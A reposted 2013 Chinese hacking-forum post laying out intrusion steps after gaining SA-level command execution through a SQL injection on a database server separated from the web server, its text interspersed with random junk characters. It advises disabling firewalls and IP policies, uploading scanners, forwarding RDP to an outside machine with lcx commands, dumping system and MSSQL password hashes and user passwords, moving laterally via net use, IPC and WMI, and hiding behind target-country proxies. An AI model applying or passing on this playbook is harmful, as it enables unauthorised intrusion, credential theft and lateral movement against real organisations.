当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
* T1 m& ]$ P4 a( x
/ o2 } w5 e. T7 [; C6 U1 ^- p ? C* o$ l: ]( `+ S: V+ K& S+ {
. y, }( v0 e! k( [7 I7 S5 h
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
8 k! |6 s8 u, J6 Y3 t) b- Q* R
. d1 d3 a, r' \2 p8 Z3 K4 L
6 V+ |3 `8 y) d" P' `3 V- j一、DB机有公网IP., S" r8 z c6 z6 S' H- N6 D; K
8 Z+ Y8 \ X3 |
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.7 Y7 A' p6 g) ?7 {0 f* S" M# ?
& o: j: P/ L+ s: ]& l) f' D" p# e% E I: Z L% J
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
# l- u+ }6 M! }! f$ V1 o
! ?2 N) D0 U: ]) R _5 j- `
, i1 X" R7 e; d; A- _. @" f3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com6 Z% Q, Z5 _7 F+ C
S1 `. S" \( J+ b
- S0 |$ |* h' q, r# l4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.2 v8 o0 j8 X# F
8 Z9 |2 b2 x: p z
" L3 a) Z, I! W( P, {. N6 C; L% j5 k% c* F: A
二、DB机只有内网IP8 Y) V9 f$ n, s" q7 u* z
8 E- Y9 } p5 w) c* i0 |/ M
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
6 J8 B, ]! P0 X! |1 O2 F I4 j. U5 e& u Q; |( f
# M3 k% x7 Z. J1 l" u
2:停掉防火墙和IP策略再从内往外扫描.
3 t0 F _8 f' s# l( f' I$ \7 b3 D+ W
- W; ~$ [" c* O, V
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.) K0 n* w% D) C+ d) S
! Y" p* f( v7 e4 Q. I$ [. K5 F0 s: O1 k+ B/ w3 ?( I' A! J, \7 j. i
4:学会密码规律分析往往会有惊喜.
* L! h2 ^* @+ X4 J$ ^% Q: T; H9 h( v% B' S8 }$ K
/ X- ?: \! D: t6 E. E* P5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等- i: B k+ Q* x/ k) N1 B
3 [1 h9 p6 b7 D0 N$ G( U
/ [7 ]4 u3 I' f. U3 S9 L2 C; e% U有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对